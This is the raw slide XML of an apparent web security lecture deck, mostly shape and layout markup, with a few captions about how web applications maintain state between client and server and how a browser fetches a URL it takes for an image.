            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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4761" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82472B47-EE3A-B943-A661-0E17D991857C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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711BF9A1-0788-D849-BD40-A7251FB029D9}"/>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3CE04B81-3D2B-7049-BFC2-3A29B2D88C9D}"/>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4764" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EAC3-C54C-5A4F-93EF-4F3971BD4D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="5908675"/>
            <a:ext cx="2132013" cy="16954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4765" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C092FCC8-575D-1B49-B3F6-617EB3809AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931863" y="5943600"/>
            <a:ext cx="2051050" cy="16097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4766" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A70D70BF-901E-8843-8B78-C4DF23FFFBDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931863" y="59436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4767" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A85BDC27-1B5D-0C4E-9333-FCB29B665684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1111250" y="64912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8AFAD1AA-2C77-1A4A-A422-182C4935AE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="74755" idx="2"/>
            <a:endCxn id="74764" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1979613" y="4533900"/>
            <a:ext cx="42862" cy="13747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4769" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74DF3CC-4C54-7640-AF86-032568521D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2139950" y="5030788"/>
            <a:ext cx="1716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800"/>
              <a:t>connected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82D08A1-2104-1847-9EDA-1237A87DA674}"/>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5779" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9182BE89-F825-534B-84DC-4FB7DE7A3CDE}"/>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5780" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249FB983-C44A-C946-BB96-D030451A0035}"/>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5781" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DD8041-065B-3A45-A14E-AB57AFD11554}"/>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0B8151C4-336F-8C47-ABE2-9303326A1CF7}"/>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62FA3C32-706D-2E48-990B-585CB19A0F76}"/>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5784" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34861470-66BF-9140-BF23-89128DF7B52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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5785" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63FEB672-BC7E-8A4B-8138-82F810C51B55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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FFAFFD81-3E33-724B-AF4C-114898B88A42}"/>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A45DA14F-07CD-1E4F-ADF8-1FAD72ABDA60}"/>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E592E4B4-E4D8-5848-930F-8877E19144C4}"/>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F57BD494-0BA0-C247-97E9-D44F8907D6D2}"/>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CE7B74AD-F2A0-EC4C-91F5-67D5D06B70D8}"/>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75791" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC32B4ED-86D9-AF40-90BF-99E021E2BF56}"/>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7B2F994-3B5D-FE4E-A5D3-096729D82965}"/>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6803" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6808A054-134F-0349-9712-8D33B6541240}"/>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6804" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF91D37-2DB8-C84B-80FF-EC502D96200F}"/>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6805" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67A01D3-AF85-8541-AC33-C902A108D1FF}"/>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D82D16E8-9340-7F4A-8637-ACE636E30F48}"/>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F0DE6EF1-F37D-CA43-9B60-CB34A8C24874}"/>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6808" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44070E2E-2CA0-5B40-927D-D804099CD5CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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6809" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197EF8B6-8F44-B948-A082-FD12F59FBE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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64B63BBD-F197-9548-B99C-D3CE359E324C}"/>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43C78742-B35C-5747-8A9A-779327089690}"/>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7974AD46-A563-9F4A-9C13-8C6561BAC003}"/>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3062FB58-818C-7C4A-BE1F-8315FD66E08F}"/>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BF21E087-122F-EB43-B5C3-80E26BFB1F31}"/>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76815" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48DB2634-4E5D-7944-A9F3-5477250AE789}"/>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
        <p:nvSpPr>
          <p:cNvPr id="76816" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CE5CFC-B1E8-7447-A7C3-82F138CED245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="37496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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">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2210B5D-CEBC-F34F-A1B4-1C9BB119F8AA}"/>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7827" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2462675D-D10E-E04C-8AB9-A598B7F620DC}"/>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7828" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE4848E-38AA-D347-96F2-571586E0158B}"/>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7829" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D0CDD1-0CE1-6B42-9799-FE830CC7EDD1}"/>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FC359E29-2DB3-474D-B8BE-80002F444DC1}"/>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4C8F06D5-C1E2-B04A-B7DC-53953BF43D24}"/>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7832" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B3C8D2-0DCE-E44B-866D-AAE1678A6216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7807325" y="1857375"/>
            <a:ext cx="2060575" cy="941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7833" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938F7557-BFF2-4846-9846-328D4084D639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7837488" y="1866900"/>
            <a:ext cx="2000250" cy="931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B14F02A8-7966-FC48-9357-FA47A15A912C}"/>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D906C4D3-577E-9747-A716-55679D0C3754}"/>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B7283A1-D8E3-A546-8BCB-BF3157982244}"/>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CE615700-A329-084E-8DE1-C764A3C82295}"/>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72F7CB0A-B0B6-684F-A68F-B6B1566E26DB}"/>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77839" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9516C1B-9246-6941-A473-AD2B7735922B}"/>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
        <p:nvSpPr>
          <p:cNvPr id="77840" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C61D26D-6AD2-EC48-BAD7-0396325B3360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5784850"/>
            <a:ext cx="37496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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser automatically  visits the URL to obtain  what it believes will be  an image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77841" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE058BA4-852B-1A4A-A65C-DC1C626F9D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7773988" y="4994275"/>
            <a:ext cx="2132012" cy="16954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7842" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2033F0-3707-C743-986F-18CA995917C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="5029200"/>
            <a:ext cx="2051050" cy="16097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7843" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625267F7-206C-5F46-8372-94AD696AA5D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7791450" y="50292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7844" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E47D59-C922-0D48-BC5B-6589C7149EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970838" y="55768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96A864D-6D44-6841-842F-67029C6F1841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1220227" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="45" dirty="0"/>
              <a:t>Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-55" dirty="0"/>
              <a:t>State</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1677AD0-1154-E043-9896-6811D01E59B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4322763"/>
            <a:ext cx="150813" cy="317500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="30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11FA75F9-4A64-E14B-8ED0-310495C693A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4260850"/>
            <a:ext cx="8966200" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application maintains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ephemeral</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" i="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (short-live)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1B797F-56A2-1C4A-830D-EDF3C186A8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2130425" y="2601913"/>
            <a:ext cx="1539875" cy="1143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1510" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{227DB5C0-2A79-A041-A86F-BA42635758A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2149475" y="2611438"/>
            <a:ext cx="1500188" cy="11049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1511" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5757610C-A759-7143-80C3-A6F28F21678A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6507163" y="2559050"/>
            <a:ext cx="1539875" cy="11445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1512" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA072B6-4714-A046-AB79-226D0D951186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6526213" y="2568575"/>
            <a:ext cx="1501775" cy="11049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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88900F42-4A47-E44F-8578-7D16BE3F1199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463800" y="2146300"/>
            <a:ext cx="879475" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB797A01-4E2F-D347-AA89-627ADE9A09DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="2095500"/>
            <a:ext cx="990600" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21515" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81684197-F321-7B45-92CA-B8D04E8B4B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4151313" y="3673475"/>
            <a:ext cx="2081212" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2081529"/>
              <a:gd name="T1" fmla="*/ 29375 w 2081529"/>
              <a:gd name="T2" fmla="*/ 2073974 w 2081529"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T3">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T4">
                <a:pos x="T1" y="0"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2081529">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29467" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2081252"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16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D582764E-A802-9E43-B2E4-75D58FE59F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3944938" y="3556000"/>
            <a:ext cx="236537" cy="236538"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
